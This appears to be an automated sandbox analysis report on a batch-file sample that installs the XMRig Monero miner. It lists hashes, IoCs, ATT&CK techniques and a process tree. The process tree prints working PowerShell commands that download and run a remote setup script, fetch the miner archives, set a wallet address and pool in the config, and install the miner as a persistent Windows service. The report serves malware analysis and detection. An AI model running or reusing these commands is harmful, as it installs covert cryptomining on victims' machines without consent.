xmrig | 1d5778d0a8fe83da7b01513ae7cb50e998b87b8554f16b0488b4b3c6b010a7c1

Analysis

max time kernel
356s
max time network
329s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/11/2024, 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.bat
Size

406B
MD5

8a999fb795bb0f9712f636cd512d2369
SHA1

993d13dec1223fb8109f2e0e68e77de12ea26269
SHA256

1d5778d0a8fe83da7b01513ae7cb50e998b87b8554f16b0488b4b3c6b010a7c1
SHA512

05e83fe2f6b8e0b3ff795b57cbfb946db0c5a4f0ab16070b1f838c011df1a6a0deb23ca05965ede0f8c86ba2c13440c9159590e0242f623f3d28640650036893

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 36 IoCs

miner

resource	yara_rule
behavioral1/files/0x000b000000023ba1-65.dat	family_xmrig
behavioral1/files/0x000b000000023ba1-65.dat	xmrig
behavioral1/memory/1424-68-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-203-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-204-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-205-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-206-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-207-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-208-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-209-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-210-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-211-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-212-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-213-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-214-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-215-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-216-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-217-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-218-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-219-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-220-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-221-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-222-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-223-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-224-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-225-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-226-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-227-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-228-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-229-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-230-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-231-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-232-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-233-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-234-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig
behavioral1/memory/412-235-0x0000000000400000-0x000000000102E000-memory.dmp	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
7	1196	powershell.exe
28	4360	powershell.exe
29	4168	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1424	xmrig.exe
2596	nssm.exe
4628	nssm.exe
1404	nssm.exe
1468	nssm.exe
392	nssm.exe
3952	nssm.exe
532	nssm.exe
412	xmrig.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2716	powershell.exe
3504	powershell.exe
3052	powershell.exe
1324	powershell.exe
4748	powershell.exe
4728	powershell.exe
1196	powershell.exe
4324	powershell.exe
2684	powershell.exe
2128	powershell.exe
1792	powershell.exe
4168	powershell.exe
4360	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
28	raw.githubusercontent.com
29	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
392	sc.exe
3956	sc.exe
4952	sc.exe
3248	sc.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5112	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3232	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
1196	powershell.exe
1196	powershell.exe
4360	powershell.exe
4360	powershell.exe
4360	powershell.exe
3504	powershell.exe
3504	powershell.exe
3052	powershell.exe
3052	powershell.exe
4324	powershell.exe
4324	powershell.exe
1324	powershell.exe
1324	powershell.exe
2684	powershell.exe
2684	powershell.exe
4748	powershell.exe
4748	powershell.exe
4728	powershell.exe
4728	powershell.exe
2128	powershell.exe
2128	powershell.exe
1792	powershell.exe
1792	powershell.exe
4168	powershell.exe
4168	powershell.exe
2716	powershell.exe
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	3232	taskkill.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeLockMemoryPrivilege	412	xmrig.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
412	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1420 wrote to memory of 1196	1420	cmd.exe	84
PID 1420 wrote to memory of 1196	1420	cmd.exe	84
PID 1196 wrote to memory of 4200	1196	powershell.exe	86
PID 1196 wrote to memory of 4200	1196	powershell.exe	86
PID 4200 wrote to memory of 4364	4200	cmd.exe	87
PID 4200 wrote to memory of 4364	4200	cmd.exe	87
PID 4364 wrote to memory of 564	4364	net.exe	88
PID 4364 wrote to memory of 564	4364	net.exe	88
PID 4200 wrote to memory of 3464	4200	cmd.exe	90
PID 4200 wrote to memory of 3464	4200	cmd.exe	90
PID 4200 wrote to memory of 2908	4200	cmd.exe	92
PID 4200 wrote to memory of 2908	4200	cmd.exe	92
PID 4200 wrote to memory of 1288	4200	cmd.exe	93
PID 4200 wrote to memory of 1288	4200	cmd.exe	93
PID 4200 wrote to memory of 3384	4200	cmd.exe	94
PID 4200 wrote to memory of 3384	4200	cmd.exe	94
PID 4200 wrote to memory of 1976	4200	cmd.exe	95
PID 4200 wrote to memory of 1976	4200	cmd.exe	95
PID 4200 wrote to memory of 392	4200	cmd.exe	104
PID 4200 wrote to memory of 392	4200	cmd.exe	104
PID 4200 wrote to memory of 3956	4200	cmd.exe	105
PID 4200 wrote to memory of 3956	4200	cmd.exe	105
PID 4200 wrote to memory of 3232	4200	cmd.exe	106
PID 4200 wrote to memory of 3232	4200	cmd.exe	106
PID 4200 wrote to memory of 5112	4200	cmd.exe	107
PID 4200 wrote to memory of 5112	4200	cmd.exe	107
PID 4200 wrote to memory of 4360	4200	cmd.exe	112
PID 4200 wrote to memory of 4360	4200	cmd.exe	112
PID 4200 wrote to memory of 3504	4200	cmd.exe	114
PID 4200 wrote to memory of 3504	4200	cmd.exe	114
PID 4200 wrote to memory of 3052	4200	cmd.exe	115
PID 4200 wrote to memory of 3052	4200	cmd.exe	115
PID 4200 wrote to memory of 1424	4200	cmd.exe	116
PID 4200 wrote to memory of 1424	4200	cmd.exe	116
PID 4200 wrote to memory of 376	4200	cmd.exe	117
PID 4200 wrote to memory of 376	4200	cmd.exe	117
PID 376 wrote to memory of 4324	376	cmd.exe	118
PID 376 wrote to memory of 4324	376	cmd.exe	118
PID 4324 wrote to memory of 4824	4324	powershell.exe	119
PID 4324 wrote to memory of 4824	4324	powershell.exe	119
PID 4200 wrote to memory of 1324	4200	cmd.exe	120
PID 4200 wrote to memory of 1324	4200	cmd.exe	120
PID 4200 wrote to memory of 2684	4200	cmd.exe	121
PID 4200 wrote to memory of 2684	4200	cmd.exe	121
PID 4200 wrote to memory of 4748	4200	cmd.exe	122
PID 4200 wrote to memory of 4748	4200	cmd.exe	122
PID 4200 wrote to memory of 4728	4200	cmd.exe	123
PID 4200 wrote to memory of 4728	4200	cmd.exe	123
PID 4200 wrote to memory of 2128	4200	cmd.exe	124
PID 4200 wrote to memory of 2128	4200	cmd.exe	124
PID 4200 wrote to memory of 1792	4200	cmd.exe	125
PID 4200 wrote to memory of 1792	4200	cmd.exe	125
PID 4200 wrote to memory of 4168	4200	cmd.exe	126
PID 4200 wrote to memory of 4168	4200	cmd.exe	126
PID 4200 wrote to memory of 2716	4200	cmd.exe	128
PID 4200 wrote to memory of 2716	4200	cmd.exe	128
PID 4200 wrote to memory of 4952	4200	cmd.exe	129
PID 4200 wrote to memory of 4952	4200	cmd.exe	129
PID 4200 wrote to memory of 3248	4200	cmd.exe	130
PID 4200 wrote to memory of 3248	4200	cmd.exe	130
PID 4200 wrote to memory of 2596	4200	cmd.exe	131
PID 4200 wrote to memory of 2596	4200	cmd.exe	131
PID 4200 wrote to memory of 4628	4200	cmd.exe	132
PID 4200 wrote to memory of 4628	4200	cmd.exe	132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 4AAvfNb9cf3YKeH9PkCPuR9NBntQsbifzgHAMhDMV3nZ7dLCvZWA2azKyXyAzyWMcqcqbqKYFTUw5CLDrpKGsHmS1wrcXZU; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B89.tmp.bat" 4AAvfNb9cf3YKeH9PkCPuR9NBntQsbifzgHAMhDMV3nZ7dLCvZWA2azKyXyAzyWMcqcqbqKYFTUw5CLDrpKGsHmS1wrcXZU"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4200
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4364
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:564
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:3464
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:2908
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1288
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3384
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:1976
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:392
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3956
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3232
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:5112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3052
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:1424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:376
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4324
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:4824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"4AAvfNb9cf3YKeH9PkCPuR9NBntQsbifzgHAMhDMV3nZ7dLCvZWA2azKyXyAzyWMcqcqbqKYFTUw5CLDrpKGsHmS1wrcXZU\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Glzcsnlk\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2716
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4952
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3248
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:2596
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:4628
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:1404
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:1468
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:392
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:3952

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:532
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
52e2a8acc5fa563d87101f05269b9358

SHA1
37bc3aa23071c988939eefbd38ae1b473babd514

SHA256
b3062c1f9d89be951de9ae32c7f867ca0016f64dcb56de4859df8d60e322a926

SHA512
2ac9b63345e6970814cbccfc01d0afad93f2fad63815dd84828f298340de4d2045e9c899ab3643e8a6495c7c8dd2ca6d7b6a8a8ac0d23e7415da5f26042c8a8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cf6bc2f40ddd3c8f67c27cf832bf12aa

SHA1
d8c213f00f2c2f464e5f3af78f6591ab5a251cbe

SHA256
bb8986c00ce390e69099c973c7ce3d13909562eb200307898d5205f4a63ed4c3

SHA512
6f7959cb878086cbd6d09578ca99f1c985e2545a59b37ea73603e0b433c24408be975f3054fe05d1470a9993e37d345c2b0b16e101c87f8cf83d3a0ed2acd088

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
16929f10c2fcf92669443c186e5a8903

SHA1
f735a80e73b86ca6ba2187ecdd203b077288cf80

SHA256
acae947a7e5fcab3498d20b7944ce524c702f90375e9d3c9b33ac755f70a94d8

SHA512
782dd5a3569d0a16066c1b97139457533bbbe4a5a966dccecced47a1ab4b2d1166fc794f58475cd3ac2bcc9cb3609c43c54542ca0bbfda811361372eff8619dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
13bbd5e562606c06ce0f03133743f71d

SHA1
88979df73e69707d412899b532a68b5de958aa49

SHA256
4b3e95d1914cc82bdbed302d54793df3a1216305399f79f5a0a55524e1204211

SHA512
beea8205d83fa8c6a9b20031f91efe939f374aa503a4d84f5c84424bc2ce47fbed3d332fe6e3a4f7b44248973368693d12629749523787c9aa3e68fd52214515

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ebe2b29e24ce325eb8aa3410ed019927

SHA1
b369df419bd309bbd4404c2c36252465ae58d2b5

SHA256
13c04f40bde2dec10f3dc0d858c4c957a0c21cd3c60a7cb96f8dfafc0bed3bd3

SHA512
1df7a78ef6e6eef4ab20082cd33f0927a4d0e4b989c5c011491f5e664c74e8d9dd2e37f494a866c0aac4fb786a23dcdfd08b3cdc52f8cf08024f3caee15fd55a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
06dc824e3adbd41afecca5c6ac2d69d8

SHA1
f50a2c9c44a784493eb7fe5c8d7a75e8661e1ee2

SHA256
b517808f733460fb1df6344bc7b6af39d742e55f73759d894bf8a89d27b38528

SHA512
733ccd17bbc8f8b22da7213591010b989603d97904f06a89660334f2818aac062e41e6bf995bd1798ac78087af5adaabdb2f7a65bc6a77594c11475d3d394103

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d5a6408e58a8e6cdcac441b2724bdeea

SHA1
c32347262903a5db5422c41c280fe975731155a1

SHA256
6927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3

SHA512
f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e6deb72305dcf3e7d6c8a37bc5010937

SHA1
dbc24ef3ae0a84d18a5536b81faf2ec01dc57b8b

SHA256
380264a4c918dc1c1b118194ddf73111985042338b288bd02c37230402ea77dd

SHA512
e894e228655f3d60f748bda5090a6e6dbe36212a03cd2631a4328329b2616f82a8d19b1d9514fe60643ad181728f355445cf68ff987e3f59b6f9dcb1c42f7f44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1ede73ab56d246b759e0591b8584a337

SHA1
56cb3bfd6a1215051d42fe3b73fbf3343f72c083

SHA256
89d5dc55c2b205c93aaf986155f7a2d8ce08e35967e54f3129cabdb54dcff9fc

SHA512
7dbd26f41091d1d2ffae623552713d270e449f044879cd20d132a3a21d1dff15bc89d5735bded547a9f329fa58bbd9b4fc1560cc4ec95dda79d3dbc5da8a2baa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
52bf9d9a16992d287379501ef216818e

SHA1
917801b9de876bcee9e1ffe4d536b4ac9c726993

SHA256
046e6a5c3e69f8af30387182375919d7f4b7c40d815f0eaa71fc5eee5aeb8862

SHA512
0a0b64de2bc3ab2f6e4e573782f89baaf0e74f43e67508dab267ad4e866f704e9e159bc693e01ffbcb816f69328fa58eed1187bb294e2c1155aeb4d717569b0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2sqjazs.h1k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7B89.tmp.bat

Filesize
14KB

MD5
012a668bd1043d6b0a4bcd03d02ded41

SHA1
8595831d19a06d5ad38cb38b793eb1bdcc16b816

SHA256
57375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05

SHA512
e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
